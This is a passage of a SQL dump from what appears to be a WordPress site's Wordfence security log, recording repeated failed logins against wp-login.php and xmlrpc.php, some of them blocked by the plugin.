Firefox/62.0','loginFailValidUsername',NULL,NULL),(5861,0.000000,1629269303.467971,'\0\0\0\0\0\0\0\0\0\0���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5862,0.000000,1629269510.034309,'\0\0\0\0\0\0\0\0\0\0���p�\n',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5863,0.000000,1629269938.376309,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5864,0.000000,1629270147.625909,'\0\0\0\0\0\0\0\0\0\0��B�S',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5865,0.000000,1629270324.046287,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5866,0.000000,1629270551.822621,'\0\0\0\0\0\0\0\0\0\0�����z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5867,0.000000,1629270754.693815,'\0\0\0\0\0\0\0\0\0\0��£��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5868,0.000000,1629270960.355548,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5869,0.000000,1629271176.939566,'\0\0\0\0\0\0\0\0\0\0����%+',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5870,0.000000,1629271376.613466,'\0\0\0\0\0\0\0\0\0\0��#���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5871,0.000000,1629271559.459774,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5872,0.000000,1629271769.550652,'\0\0\0\0\0\0\0\0\0\0��gyY�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5873,0.000000,1629271972.967607,'\0\0\0\0\0\0\0\0\0\0��g1?',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5874,0.000000,1629272203.879099,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5875,0.000000,1629272404.500039,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5876,0.000000,1629272622.418231,'\0\0\0\0\0\0\0\0\0\0��4��~',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5877,0.000000,1629272802.304471,'\0\0\0\0\0\0\0\0\0\0���5�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5878,0.000000,1629273040.255895,'\0\0\0\0\0\0\0\0\0\0���~�+',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5879,0.000000,1629273219.831111,'\0\0\0\0\0\0\0\0\0\0��/�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5880,0.000000,1629273455.702269,'\0\0\0\0\0\0\0\0\0\0��O�-',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5881,0.000000,1629273849.717752,'\0\0\0\0\0\0\0\0\0\0���C�u',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5882,0.000000,1629274085.970541,'\0\0\0\0\0\0\0\0\0\0��\"P�}',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5883,0.000000,1629274271.067183,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5884,0.000000,1629274486.614486,'\0\0\0\0\0\0\0\0\0\0����8',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5885,0.000000,1629274690.632582,'\0\0\0\0\0\0\0\0\0\0��/�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5886,0.000000,1629274931.366352,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5887,0.000000,1629275111.667519,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5888,0.000000,1629275322.187354,'\0\0\0\0\0\0\0\0\0\0��#ݵ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5889,0.000000,1629275555.458954,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5890,0.000000,1629275747.885400,'\0\0\0\0\0\0\0\0\0\0���_nq',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5891,0.000000,1629275957.574225,'\0\0\0\0\0\0\0\0\0\0��e%�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5892,0.000000,1629276197.761719,'\0\0\0\0\0\0\0\0\0\0����jQ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5893,0.000000,1629276422.456274,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5894,0.000000,1629276626.158833,'\0\0\0\0\0\0\0\0\0\0��go(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5895,0.000000,1629276819.257316,'\0\0\0\0\0\0\0\0\0\0��@�2�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5896,0.000000,1629277051.199571,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5897,0.000000,1629277237.887024,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5898,0.000000,1629278107.376030,'\0\0\0\0\0\0\0\0\0\0����R',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5899,0.000000,1629278484.143862,'\0\0\0\0\0\0\0\0\0\0����E.',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5900,0.000000,1629278835.154455,'\0\0\0\0\0\0\0\0\0\0��o���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5901,0.000000,1629279228.249691,'\0\0\0\0\0\0\0\0\0\0���l��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5902,0.000000,1629279549.047348,'\0\0\0\0\0\0\0\0\0\0��3�\"o',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5903,0.000000,1629279910.890692,'\0\0\0\0\0\0\0\0\0\0����\'B',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5904,0.000000,1629280297.932255,'\0\0\0\0\0\0\0\0\0\0��ca�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5905,0.000000,1629280663.991795,'\0\0\0\0\0\0\0\0\0\0��gt�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5906,0.000000,1629281381.461397,'\0\0\0\0\0\0\0\0\0\0�����o',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5907,0.000000,1629281756.011067,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5908,0.000000,1629282130.555195,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5909,0.000000,1629282519.731969,'\0\0\0\0\0\0\0\0\0\0��gij',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5910,0.000000,1629282881.010235,'\0\0\0\0\0\0\0\0\0\0��-��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5911,0.000000,1629283259.329990,'\0\0\0\0\0\0\0\0\0\0��gk�s',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5912,0.000000,1629283628.813274,'\0\0\0\0\0\0\0\0\0\0��\05�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5913,0.000000,1629283998.581680,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5914,0.000000,1629284337.470542,'\0\0\0\0\0\0\0\0\0\0��/jv�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5915,0.000000,1629284742.720318,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5916,0.000000,1629285113.993467,'\0\0\0\0\0\0\0\0\0\0����O',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5917,0.000000,1629285462.029329,'\0\0\0\0\0\0\0\0\0\0��-��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5918,0.000000,1629285828.970766,'\0\0\0\0\0\0\0\0\0\0��ŜJ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5919,0.000000,1629286231.029925,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5920,0.000000,1629286548.120627,'\0\0\0\0\0\0\0\0\0\0����%�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5921,0.000000,1629286939.773451,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5922,0.000000,1629287346.819641,'\0\0\0\0\0\0\0\0\0\0��w4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5923,0.000000,1629287694.184304,'\0\0\0\0\0\0\0\0\0\0��m�\Z',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5924,0.000000,1629288054.133963,'\0\0\0\0\0\0\0\0\0\0��Ғ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5925,0.000000,1629288425.039114,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5926,0.000000,1629288822.836204,'\0\0\0\0\0\0\0\0\0\0���q�t',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5927,0.000000,1629289211.594318,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5928,0.000000,1629289601.839124,'\0\0\0\0\0\0\0\0\0\0���Ů�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5929,0.000000,1629289989.560751,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5930,0.000000,1629290371.963533,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5931,0.000000,1629290750.989172,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5932,0.000000,1629291072.584243,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5933,0.000000,1629291486.139828,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5934,0.000000,1629291884.404536,'\0\0\0\0\0\0\0\0\0\0�����]',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5935,0.000000,1629292275.044162,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5936,0.000000,1629292715.415992,'\0\0\0\0\0\0\0\0\0\0����K�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5937,0.000000,1629293448.839918,'\0\0\0\0\0\0\0\0\0\0���~',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5938,0.000000,1629293820.482763,'\0\0\0\0\0\0\0\0\0\0��Y�ji',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5939,0.000000,1629294249.333109,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5940,0.000000,1629294617.150122,'\0\0\0\0\0\0\0\0\0\0��#ݵ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5941,0.000000,1629295002.378614,'\0\0\0\0\0\0\0\0\0\0��/4�*',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5942,0.000000,1629295421.512218,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5943,0.000000,1629295801.245471,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5944,0.000000,1629296175.241557,'\0\0\0\0\0\0\0\0\0\0��H\n��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5945,0.000000,1629296620.538392,'\0\0\0\0\0\0\0\0\0\0��4��~',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5946,0.000000,1629296988.095149,'\0\0\0\0\0\0\0\0\0\0����V�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5947,0.000000,1629297367.828171,'\0\0\0\0\0\0\0\0\0\0��@���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5948,0.000000,1629297770.331165,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5949,0.000000,1629298144.316990,'\0\0\0\0\0\0\0\0\0\0���&V',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5950,0.000000,1629298544.374560,'\0\0\0\0\0\0\0\0\0\0���\r\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5951,0.000000,1629298696.802837,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(5952,0.000000,1629298893.518375,'\0\0\0\0\0\0\0\0\0\0���;��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5953,0.000000,1629299338.907127,'\0\0\0\0\0\0\0\0\0\0��2tb',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5954,0.000000,1629299498.868663,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(5955,0.000000,1629299722.714410,'\0\0\0\0\0\0\0\0\0\0���	F�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5956,0.000000,1629299904.137168,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36','loginFailValidUsername',NULL,NULL),(5957,0.000000,1629300112.083993,'\0\0\0\0\0\0\0\0\0\0��w��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5958,0.000000,1629300305.753925,'\0\0\0\0\0\0\0\0\0\0��իо',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailValidUsername',NULL,NULL),(5959,0.000000,1629300503.361727,'\0\0\0\0\0\0\0\0\0\0��H�%�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5960,0.000000,1629300900.939458,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 